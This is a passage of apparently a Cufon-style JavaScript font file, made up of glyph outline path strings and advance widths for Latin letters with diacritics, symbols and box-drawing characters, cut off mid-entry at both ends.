2r20,0r-163,272r-19,0xm256,-94v-5,-35,-66,-30,-65,7r-18,0v0,-28,24,-48,53,-48v34,0,61,31,43,61v-10,17,-41,42,-58,58r66,0r0,17r-112,0r63,-57v17,-17,24,-19,28,-38","w":299},{"d":"53,33v0,-43,53,-65,93,-42r0,-201r164,-51r0,228v2,48,-21,67,-63,69v-31,1,-49,-18,-50,-46v0,-43,52,-65,93,-42r0,-149r-123,38r0,172v1,45,-22,69,-65,70v-28,0,-49,-18,-49,-46","w":360},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm45,-312r121,0r0,21r-121,0r0,-21","w":193},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm45,-250v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13","w":218},{"d":"52,-191r0,141r142,-141r0,191r-24,0r0,-140r-140,140r-3,0r0,-191r25,0xm72,-268v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":221},{"d":"113,-94r-116,0r0,-31r147,0r0,234r-31,0r0,-203"},{"d":"40,-191v-12,-68,49,-99,95,-66v11,8,15,21,16,35r-25,0v-3,-16,-13,-24,-29,-24v-30,0,-33,21,-32,55r39,0r0,21r-39,0r0,170r-25,0r0,-170r-25,0r0,-21r25,0xm126,-191r25,0r0,191r-25,0r0,-191","w":175},{"d":"33,-42v26,33,59,34,73,-8r-94,-208r29,0r78,176r72,-177r28,0r-98,233v-20,47,-81,39,-107,0","w":232},{"d":"183,0r-35,0r-96,-86r0,86r-25,0r0,-191r25,0r0,77r88,-77r37,0r-105,91","w":180},{"d":"9,-191r27,0r63,139r64,-139r26,0r-87,191r-5,0","w":199},{"d":"57,0r-26,0r0,-259r130,0r0,26r-104,0r0,233","w":166},{"d":"21,-96v0,-96,129,-134,175,-60r0,-35r23,0r0,34v28,-47,109,-51,148,-10v18,20,28,44,28,74r-172,0v3,43,30,75,75,75v37,0,56,-17,70,-45r21,11v-20,62,-136,78,-170,18r0,34r-23,0r0,-35v-19,25,-40,39,-76,40v-53,1,-99,-47,-99,-101xm368,-114v-5,-60,-95,-77,-129,-31v-7,8,-12,19,-15,31r144,0xm197,-95v-1,-46,-30,-77,-76,-77v-43,0,-74,32,-75,76v-1,42,35,78,76,78v42,0,75,-35,75,-77xm220,-281r38,0r-52,54r-24,0","w":416},{"d":"19,-328r22,0r0,22r-22,0r0,-22xm63,-328r21,0r0,22r-21,0r0,-22xm106,-328r22,0r0,22r-22,0r0,-22xm150,-328r22,0r0,22r-22,0r0,-22xm194,-328r22,0r0,22r-22,0r0,-22xm238,-328r22,0r0,22r-22,0r0,-22xm-3,-284r22,0r0,22r-22,0r0,-22xm41,-284r22,0r0,22r-22,0r0,-22xm84,-284r22,0r0,22r-22,0r0,-22xm128,-284r22,0r0,22r-22,0r0,-22xm172,-284r22,0r0,22r-22,0r0,-22xm216,-284r22,0r0,22r-22,0r0,-22xm19,-240r22,0r0,22r-22,0r0,-22xm63,-240r21,0r0,22r-21,0r0,-22xm106,-240r22,0r0,22r-22,0r0,-22xm150,-240r22,0r0,22r-22,0r0,-22xm194,-240r22,0r0,22r-22,0r0,-22xm238,-240r22,0r0,22r-22,0r0,-22xm-3,-196r22,0r0,22r-22,0r0,-22xm41,-196r22,0r0,22r-22,0r0,-22xm84,-196r22,0r0,22r-22,0r0,-22xm128,-196r22,0r0,22r-22,0r0,-22xm172,-196r22,0r0,22r-22,0r0,-22xm216,-196r22,0r0,22r-22,0r0,-22xm19,-152r22,0r0,22r-22,0r0,-22xm63,-152r21,0r0,22r-21,0r0,-22xm106,-152r22,0r0,22r-22,0r0,-22xm150,-152r22,0r0,22r-22,0r0,-22xm194,-152r22,0r0,22r-22,0r0,-22xm238,-152r22,0r0,22r-22,0r0,-22xm-3,-109r22,0r0,22r-22,0r0,-22xm84,-109r22,0r0,22r-22,0r0,-22xm128,-109r22,0r0,22r-22,0r0,-22xm172,-109r22,0r0,22r-22,0r0,-22xm216,-109r22,0r0,22r-22,0r0,-22xm41,-109r22,0r0,22r-22,0r0,-22xm238,-65r22,0r0,22r-22,0r0,-22xm194,-65r22,0r0,22r-22,0r0,-22xm150,-65r22,0r0,22r-22,0r0,-22xm106,-65r22,0r0,22r-22,0r0,-22xm63,-65r21,0r0,22r-21,0r0,-22xm19,-65r22,0r0,22r-22,0r0,-22xm-3,-21r22,0r0,22r-22,0r0,-22xm41,-21r22,0r0,22r-22,0r0,-22xm84,-21r22,0r0,22r-22,0r0,-22xm128,-21r22,0r0,22r-22,0r0,-22xm172,-21r22,0r0,22r-22,0r0,-22xm216,-21r22,0r0,22r-22,0r0,-22xm238,23r22,0r0,22r-22,0r0,-22xm194,23r22,0r0,22r-22,0r0,-22xm150,23r22,0r0,22r-22,0r0,-22xm106,23r22,0r0,22r-22,0r0,-22xm63,23r21,0r0,22r-21,0r0,-22xm19,23r22,0r0,22r-22,0r0,-22xm-3,67r22,0r0,22r-22,0r0,-22xm41,67r22,0r0,22r-22,0r0,-22xm84,67r22,0r0,22r-22,0r0,-22xm128,67r22,0r0,22r-22,0r0,-22xm172,67r22,0r0,22r-22,0r0,-22xm216,67r22,0r0,22r-22,0r0,-22"},{"d":"43,0r-25,0r0,-191r25,0r0,28v15,-23,40,-43,72,-27r-13,21v-75,-15,-56,95,-59,169xm70,-226r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":108},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77","w":245},{"d":"119,-173v-76,1,-68,89,-67,173r-25,0r0,-265r25,0r0,108v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173xm98,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":219},{"d":"119,-173v-76,1,-68,89,-67,173r-25,0r0,-265r25,0r0,108v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173","w":219},{"d":"68,-205v-43,0,-33,57,-34,104r-21,0r0,-120r21,0r0,17v30,-39,81,-16,81,41r0,62r-20,0v-4,-39,15,-104,-27,-104","w":128},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm49,-260r121,0r0,21r-121,0r0,-21","w":218},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm-20,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm52,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":72},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm265,67v-49,16,-75,-43,-34,-67r19,0v-14,12,-21,23,-21,34v1,16,18,22,38,18","w":266},{"d":"11,-259r30,0r66,107r65,-107r30,0r-82,135r0,124r-25,0r0,-124xm50,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm122,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":213},{"d":"24,-211v-7,-55,23,-66,67,-54r0,24v-22,-12,-43,-7,-43,24r0,217r-24,0r0,-211","w":72},{"d":"83,-281r-5,60r-20,0r-5,-60r30,0","w":136},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm96,-312r121,0r0,21r-121,0r0,-21","w":312},{"d":"6,-233r0,-26r142,0r0,26r-58,0r0,233r-26,0r0,-233r-58,0xm83,75r-12,-5v4,-8,7,-16,7,-22r-15,0r0,-27r28,0v1,22,-2,43,-8,54","w":153},{"d":"28,-259r26,0r0,259r-26,0r0,-259","w":81},{"d":"31,-259v-4,71,-1,126,83,112r23,0r0,-112r26,0r0,259r-26,0r0,-122v-82,3,-135,-5,-131,-85r0,-52r25,0","w":194},{"d":"2,-191r25,0r58,139r62,-139r4,0r61,139r60,-139r26,0r-83,191r-5,0r-61,-137r-61,137r-5,0xm139,-281r39,54r-25,0r-51,-54r37,0","w":299},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm69,-302v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13","w":266},{"d":"104,-160r0,82r-81,0r0,-82r81,0xm91,-146r-55,0r0,54r55,0r0,-54","w":127},{"d":"11,-108r97,0r0,22r-97,0r0,-22","w":119},{"d":"61,-169r-14,-7v7,-17,11,-21,13,-41r-16,0r0,-48r32,0v0,41,1,70,-15,96","w":126},{"d":"-7,-329r214,0r0,13r-214,0r0,-13","w":199},{"d":"18,-146v4,-55,72,-66,106,-24r-16,16v-21,-26,-62,-26,-68,7v7,45,84,41,84,96v0,59,-86,74,-115,29r16,-18v13,14,26,22,40,22v18,0,35,-14,35,-32v-4,-47,-86,-40,-82,-96xm78,41v-2,-9,-13,-8,-23,-5r5,-36r15,0r-3,21v14,-4,26,6,27,18v-1,28,-43,34,-70,23r4,-13v15,5,44,9,45,-8","w":139},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm100,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm172,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":312},{"d":"24,-265r24,0r0,265r-24,0r0,-265xm52,-333r38,0r-52,54r-24,0","w":72},{"d":"119,-173v-78,1,-67,90,-67,173r-25,0r0,-218r-26,0r0,-20r26,0r0,-27r25,0r0,27r66,0r0,20r-66,0r0,61v47,-69,159,-42,142,59r0,98r-24,0v-6,-70,23,-174,-51,-173","w":219},{"d":"157,-85v0,-59,-64,-73,-116,-45r24,-129r112,0r0,25r-92,0r-13,71v61,-20,112,20,112,79v0,102,-158,126,-169,21r26,0v5,28,23,44,54,45v35,1,62,-31,62,-67","w":199},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm2,-320v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":81},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm-3,-268v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":72},{"d":"66,-265r0,200r-26,0r0,-200r26,0xm150,-265r0,200r-25,0r0,-200r25,0xm31,-17v0,-12,10,-22,22,-22v12,0,22,10,22,22v0,12,-10,22,-22,22v-12,0,-22,-10,-22,-22xm116,-17v0,-27,44,-28,44,0v0,12,-10,22,-22,22v-12,0,-22,-10,-22,-22","w":191},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm61,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm133,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":233},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm155,67v-49,16,-75,-43,-34,-67r19,0v-14,12,-21,23,-21,34v1,16,18,22,38,18","w":233},{"d":"96,-191v49,-16,53,-20,99,-50r5,2v4,42,13,78,28,108r-4,3v-17,-22,-30,-46,-39,-73r-52,111v24,9,51,42,51,76v0,44,-38,74,-81,74v-46,0,-85,-37,-85,-81v0,-52,53,-94,107,-72r51,-112v-25,11,-52,16,-80,18r0,-4xm162,-21v0,-38,-33,-70,-69,-70v-36,-1,-68,32,-68,67v-1,38,32,70,69,70v37,0,68,-31,68,-67","w":240},{"d":"130,48r-14,-8v7,-16,11,-20,12,-40r-15,0r0,-48r32,0v0,41,1,70,-15,96xm52,48r-14,-8v7,-16,11,-20,12,-40r-15,0r0,-48r32,0v0,41,1,70,-15,96","w":180},{"d":"181,-120r0,120r-26,0r0,-120r-8,-7r-106,127r-34,0r123,-143r-113,-116r35,0r103,110r0,-110r26,0r0,110r104,-110r35,0r-114,116r123,143r-34,0r-106,-127","w":336},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm13,-265r-5,60r-20,0r-5,-60r30,0","w":312},{"d":"51,-265r14,8v-7,17,-11,21,-13,40r16,0r0,48r-32,0v0,-41,-1,-70,15,-96xm129,-265r14,8v-7,17,-11,21,-13,40r16,0r0,48r-32,0v0,-41,-1,-70,15,-96","w":180},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm55,-302v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13","w":235},{"d":"20,0r36,-259r5,0r105,213r104,-213r4,0r37,259r-25,0r-26,-185r-91,185r-7,0r-92,-186r-25,186r-25,0","w":330},{"d":"17,-259r26,0r53,187r74,-187r5,0r74,187r53,-187r27,0r-74,259r-5,0r-77,-196r-78,196r-5,0","w":345},{"d":"28,-129v0,-12,10,-22,22,-22v12,0,22,10,22,22v0,27,-44,28,-44,0","w":99},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm25,-271r24,0r51,45r-31,0r-31,-27r-33,27r-32,0","w":72},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm118,-320v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":312},{"d":"79,109r0,-203r-82,0r0,-31r180,0r0,234r-31,0r0,-203r-36,0r0,203r-31,0"},{"d":"108,5v-60,-2,-85,-34,-84,-104r0,-92r25,0v3,76,-19,172,59,172v43,0,63,-33,63,-77v0,-32,-15,-58,-45,-78r14,-22v82,37,74,205,-32,201xm122,-281r-5,60r-20,0r-5,-60r30,0xm166,-243v0,8,-8,16,-16,16v-8,0,-15,-8,-15,-16v0,-8,7,-15,15,-15v8,0,16,7,16,15xm79,-243v0,8,-7,16,-15,16v-8,0,-16,-8,-16,-16v0,-8,8,-15,16,-15v8,0,15,7,15,15","w":214},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm68,67v-49,16,-75,-43,-34,-67r19,0v-14,12,-21,23,-21,34v1,16,18,22,38,18","w":81},{"d":"146,109r0,-236r-149,0r0,-31r180,0r0,267r-31,0xm79,-60r-82,0r0,-31r113,0r0,200r-31,0r0,-169"},{"d":"43,0r-25,0r0,-191r25,0r0,28v15,-23,40,-43,72,-27r-13,21v-75,-15,-56,95,-59,169xm78,39v-3,27,-38,33,-66,24r4,-13v21,12,61,-9,29,-16v-3,0,-8,0,-13,2r2,-14v18,-5,46,-2,44,17","w":108},{"d":"179,-48v-28,-2,-44,-17,-58,-42v2,55,22,76,71,84r2,6r-149,0r1,-6v50,-7,70,-31,71,-84v-10,24,-30,41,-58,42v-25,1,-48,-22,-48,-49v0,-37,36,-64,71,-40v-27,-33,-4,-79,36,-79v41,-1,66,48,37,79v36,-23,71,2,72,39v1,27,-21,51,-48,50","w":238},{"d":"186,-74v2,43,-37,74,-84,74r-71,0r0,-259r130,0r0,26r-104,0r0,83v77,-3,126,12,129,76xm159,-74v0,-48,-46,-52,-102,-50r0,99v54,3,102,-2,102,-49","w":206},{"d":"111,-259r20,0r90,195r-23,0r-78,-168r-76,168r-23,0","w":241},{"d":"158,-57v1,59,-67,60,-131,57r0,-191r25,0r0,76v60,-4,105,6,106,58xm131,-56v0,-38,-36,-38,-78,-37r0,72v39,2,78,-2,78,-35","w":169},{"d":"189,-203v60,0,112,51,112,112v0,61,-52,112,-112,112v-60,0,-112,-52,-112,-112v0,-60,52,-112,112,-112xm146,-100v8,0,15,-6,15,-14v0,-8,-7,-14,-15,-14v-7,0,-14,7,-14,14v0,7,7,14,14,14xm232,-100v8,0,15,-7,15,-14v0,-7,-7,-14,-15,-14v-7,-1,-14,7,-14,14v0,7,7,15,14,14xm138,-55v21,46,81,45,103,0r-11,-6v-16,33,-66,34,-81,0","w":378},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm153,67v-49,16,-75,-43,-34,-67r19,0v-14,12,-21,23,-21,34v1,16,18,22,38,18","w":235},{"d":"65,-169v-16,-27,-15,-54,-15,-96r32,0r0,48r-16,0v1,13,6,27,13,41","w":126},{"d":"31,-259r26,0r0,234r100,0r0,25r-126,0r0,-259xm96,-333r38,0r-52,54r-24,0","w":166},{"d":"183,5v-53,0,-95,-41,-99,-92r-32,0r0,87r-24,0r0,-191r24,0r0,80r32,0v7,-47,47,-85,99,-85v55,0,100,47,100,101v0,53,-46,100,-100,100xm183,-18v41,0,75,-36,75,-77v0,-41,-36,-77,-75,-77v-39,0,-76,37,-75,77v0,41,33,77,75,77","w":300},{"d":"79,109r0,-203r-82,0r0,-31r263,0r0,31r-83,0r0,203r-31,0r0,-200r-36,0r0,200r-31,0"},{"d":"113,109r0,-267r147,0r0,31r-116,0r0,36r116,0r0,31r-116,0r0,169r-31,0"},{"d":"52,-47r24,11r-36,66r-18,-7","w":99},{"d":"206,0r-179,0r0,-191r25,0r0,168r111,0r0,-168r25,0r0,168r41,0r0,53r-23,0r0,-30","w":235},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0","w":233},{"d":"36,-191v1,45,-7,90,41,84r36,0r0,-84r24,0r0,191r-24,0r0,-86v-56,4,-104,-2,-101,-57r0,-48r24,0","w":164},{"d":"184,-203v60,0,112,52,112,112v0,60,-52,112,-112,112v-60,0,-112,-52,-112,-112v0,-60,52,-112,112,-112xm184,5v50,0,96,-46,96,-96v0,-50,-45,-96,-96,-96v-51,0,-96,45,-96,96v0,51,46,96,96,96xm141,-128v7,0,14,7,14,14v0,7,-7,14,-14,14v-7,0,-14,-7,-14,-14v0,-7,7,-14,14,-14xm227,-128v7,0,14,7,14,14v0,7,-7,14,-14,14v-7,0,-14,-7,-14,-14v0,-7,7,-14,14,-14xm132,-55r11,-6v16,33,66,34,81,0r12,6v-22,46,-82,45,-104,0","w":367},{"d":"113,-94r0,-234r31,0r0,203r116,0r0,31r-147,0"},{"d":"355,-77v2,86,-78,78,-166,77r0,-125r-132,0r0,125r-26,0r0,-259r26,0r0,109r132,0r0,-109r26,0r0,109v80,-3,138,1,140,73xm328,-76v-1,-56,-51,-49,-113,-49r0,100v61,0,114,8,113,-51","w":375},{"d":"113,-60r0,-268r31,0r0,170r116,0r0,31r-116,0r0,36r116,0r0,31r-147,0"},{"d":"32,0r0,-259r5,0r172,198r0,-198r26,0r0,259r-6,0r-171,-195r0,195r-26,0xm325,-172v33,0,61,28,61,61v0,33,-28,61,-61,61v-33,0,-61,-28,-61,-61v0,-33,28,-61,61,-61xm325,-73v21,0,39,-18,39,-38v1,-20,-18,-39,-39,-39v-21,0,-39,19,-39,39v0,20,18,38,39,38xm264,-18r122,0r0,18r-122,0r0,-18","w":395},{"d":"118,-196v36,1,59,17,76,40r0,-58r-54,0r0,-20r54,0r0,-31r24,0r0,31r28,0r0,20r-28,0r0,214r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm196,-95v0,-42,-35,-78,-76,-77v-45,1,-76,32,-76,77v0,44,32,77,76,77v44,0,76,-31,76,-77","w":246},{"d":"113,109r0,-437r31,0r0,170r116,0r0,31r-116,0r0,36r116,0r0,31r-116,0r0,169r-31,0"},{"d":"292,-129v0,74,-61,136,-135,136v-75,0,-137,-61,-137,-135v0,-74,62,-137,135,-137v76,0,137,60,137,136xm266,-129v0,-63,-53,-111,-110,-111v-58,-1,-109,51,-109,112v0,60,48,109,109,109v61,0,110,-49,110,-110xm221,-118r-129,0r0,-25r129,0r0,25","w":312},{"d":"26,-166r166,0r0,166r-166,0r0,-166xm39,-153r0,140r139,0r0,-140r-139,0","w":217},{"d":"126,-191r24,0r0,84r92,-84r30,0r-90,85r97,106r-32,0r-82,-92r-15,11r0,81r-24,0r0,-81r-14,-11r-83,92r-31,0r96,-106r-89,-85r30,0r91,84r0,-84","w":276},{"d":"7,-191r26,0r66,147r63,-147r27,0r-114,261r-26,0r36,-84","w":193},{"d":"125,-173v-79,0,-67,90,-67,173r-25,0r0,-220r-27,0r0,-21r27,0r0,-24r25,0r0,24r84,0r0,21r-84,0r0,63v47,-69,141,-43,142,59r1,127v2,45,-28,54,-61,40r0,-22v30,14,40,-7,36,-47v-6,-70,23,-174,-51,-173","w":225},{"d":"293,-129v-1,46,-18,76,-45,101r39,48r-32,0r-26,-33v-90,57,-212,-14,-208,-115v3,-80,55,-135,135,-137v75,-2,138,62,137,136xm47,-128v-3,81,92,138,165,94r-57,-73r31,0r46,59v70,-63,23,-196,-75,-192v-64,3,-108,47,-110,112","w":313},{"d":"113,-94r-116,0r0,-31r116,0r0,-203r31,0r0,203r116,0r0,31r-116,0r0,203r-31,0r0,-203"},{"d":"8,-201v-5,-62,87,-89,113,-34r-16,9v-20,-37,-77,-18,-77,24v0,42,57,62,77,23r16,10v-12,19,-30,29,-53,29v-36,0,-58,-30,-60,-61xm66,7r162,-272r20,0r-163,272r-19,0xm192,-60v0,-32,25,-63,57,-63v31,0,56,31,56,63v0,33,-24,63,-56,63v-33,0,-57,-30,-57,-63xm249,-16v46,0,46,-87,0,-87v-21,-1,-36,22,-36,44v0,23,16,43,36,43","w":313},{"d":"7,-187r158,0r0,28r-62,0r0,159r-34,0r0,-159r-62,0r0,-28","w":172},{"d":"128,109r0,-437r132,0r0,437r-132,0"},{"d":"144,-102v44,64,-39,141,-104,96v-13,-8,-24,-22,-35,-42r22,-13v15,28,33,42,53,42v27,0,48,-17,48,-44v0,-62,-107,-74,-107,-141v0,-49,54,-76,97,-52v11,6,22,17,34,33r-21,16v-16,-20,-22,-29,-48,-31v-36,-3,-46,46,-19,66v13,9,74,54,80,70xm101,-278r-24,0r-51,-45r31,0r31,27r32,-27r33,0","w":179},{"d":"110,-328r0,237r150,0r0,31r-180,0r0,-268r30,0xm177,-158r83,0r0,31r-114,0r0,-201r31,0r0,170"},{"d":"200,-61r0,26r-182,-83r0,-23r182,-82r0,25r-148,69","w":218},{"d":"57,21r22,10r-32,60r-16,-7","w":119},{"d":"113,-60r-116,0r0,-31r116,0r0,-36r-116,0r0,-31r116,0r0,-170r31,0r0,170r116,0r0,31r-116,0r0,36r116,0r0,31r-116,0r0,169r-31,0r0,-169"},{"d":"147,-265r-107,300r-27,0r107,-300r27,0","w":157},{"d":"260,-127r-263,0r0,-31r263,0r0,31xm113,-60r-116,0r0,-31r263,0r0,31r-116,0r0,169r-31,0r0,-169"},{"d":"39,-191v-1,-42,-2,-81,39,-79v8,0,17,2,28,5r0,24v-23,-10,-47,-11,-42,24r0,26r40,0r0,21r-40,0r0,170r-25,0r0,-170r-25,0r0,-21r25,0","w":113},{"d":"241,0r-28,0r-86,-200r-87,200r-28,0r113,-259r5,0","w":252},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm74,-312v0,-20,18,-37,38,-37v20,0,37,17,37,37v0,20,-17,38,-37,38v-20,0,-39,-17,-38,-38xm131,-312v0,-9,-9,-20,-19,-19v-10,-1,-20,9,-20,19v0,10,10,19,20,19v9,0,19,-10,19,-19","w":235},{"d":"111,-54v-1,-27,-22,-39,-52,-36r0,-21v26,2,46,-7,46,-31v0,-38,-49,-38,-73,-16r-14,-17v35,-36,110,-26,111,29v0,20,-9,34,-27,41v59,21,37,110,-29,110v-26,0,-47,-8,-63,-25r15,-18v21,29,86,28,86,-16","w":152},{"d":"29,-197v0,-37,27,-58,64,-62r0,-18r23,0r0,19v26,6,39,15,53,36r-19,15v-9,-14,-20,-22,-34,-25r0,87v48,28,72,32,72,82v0,41,-28,65,-72,69r0,55r-23,0r0,-55v-41,-3,-63,-19,-80,-46r18,-14v16,22,37,34,62,36r0,-109v-40,-20,-64,-24,-64,-70xm93,-234v-31,0,-49,33,-31,58v6,9,17,16,31,22r0,-80xm116,-19v36,-2,62,-41,37,-71v-7,-9,-19,-17,-37,-27r0,98","w":199},{"d":"21,-234r0,-25r137,0r-108,234r102,0r0,25r-142,0r109,-234r-98,0xm92,-333r38,0r-52,54r-24,0","w":172},{"d":"20,-131v0,-99,109,-165,204,-120v19,10,36,23,48,40r-20,16v-20,-26,-51,-45,-93,-45v-65,0,-109,45,-112,112v-4,105,145,149,205,68r20,15v-24,30,-61,52,-113,52v-80,2,-139,-58,-139,-138xm173,-333r38,0r-52,54r-24,0","w":292},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm63,-260r121,0r0,21r-121,0r0,-21","w":245},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm71,-268v12,24,66,25,78,0r23,0v-9,49,-116,49,-125,0r24,0","w":218},{"d":"260,-127r-263,0r0,-31r263,0r0,31xm260,-60r-263,0r0,-31r263,0r0,31"},{"d":"80,109r0,-234r180,0r0,31r-83,0r0,203r-31,0r0,-200r-36,0r0,200r-30,0"},{"d":"113,109r0,-437r31,0r0,203r116,0r0,31r-116,0r0,203r-31,0"},{"d":"249,-126v0,81,-45,128,-135,126r-83,0r0,-259r54,0v111,-3,164,38,164,133xm223,-126v0,-89,-61,-113,-167,-107r0,209v104,5,167,-13,167,-102","w":267},{"d":"193,-190v-4,67,-55,73,-136,70r0,120r-26,0r0,-259r52,0v74,-3,102,12,110,69xm166,-190v0,-49,-56,-44,-109,-43r0,87v52,2,109,7,109,-44","w":213},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77","w":245},{"d":"260,109r-263,0r0,-218r263,0r0,218"},{"d":"114,-242v-40,0,-48,36,-32,72r63,0r0,23r-56,0r5,20r51,0r0,22r-46,0v3,18,3,46,-2,59v22,18,38,26,48,26v11,0,18,-13,19,-40r25,0v0,32,-11,66,-40,67v-18,0,-39,-10,-61,-29v-10,19,-24,29,-42,29v-20,0,-36,-12,-36,-34v0,-31,35,-52,64,-33v3,-17,3,-30,-1,-45r-56,0r0,-22r51,0r-6,-20r-45,0r0,-23r39,0v-33,-70,51,-125,100,-77v12,11,17,28,18,49r-24,0v-1,-29,-13,-44,-36,-44xm34,-30v4,21,29,14,34,-6v-13,-11,-32,-12,-34,6","w":199},{"d":"105,0r-74,0r0,-259r26,0r0,235r119,0r0,-235r26,0r0,259r-73,0r0,39r-24,0r0,-39","w":233},{"d":"260,-94r-180,0r0,-234r30,0r0,203r36,0r0,-203r31,0r0,203r83,0r0,31"},{"d":"52,-157v46,-67,142,-45,142,59r0,168r-24,0r0,-161v1,-49,-6,-82,-51,-82v-77,0,-68,89,-67,173r-25,0r0,-191r25,0r0,34","w":219},{"d":"144,-60r-147,0r0,-31r116,0r0,-36r-116,0r0,-31r116,0r0,-170r31,0r0,268"},{"d":"57,-218r132,0r0,-41r26,0r0,41r23,0r0,24r-23,0r0,194r-26,0r0,-125r-132,0r0,125r-26,0r0,-194r-23,0r0,-24r23,0r0,-41r26,0r0,41xm57,-194r0,44r132,0r0,-44r-132,0","w":245},{"d":"150,-194v0,-51,-67,-62,-96,-24r-17,-15v37,-53,140,-38,140,34v0,28,-12,47,-38,59v34,11,51,34,51,69v0,66,-78,97,-134,66v-14,-8,-27,-21,-39,-40r20,-12v20,28,31,41,67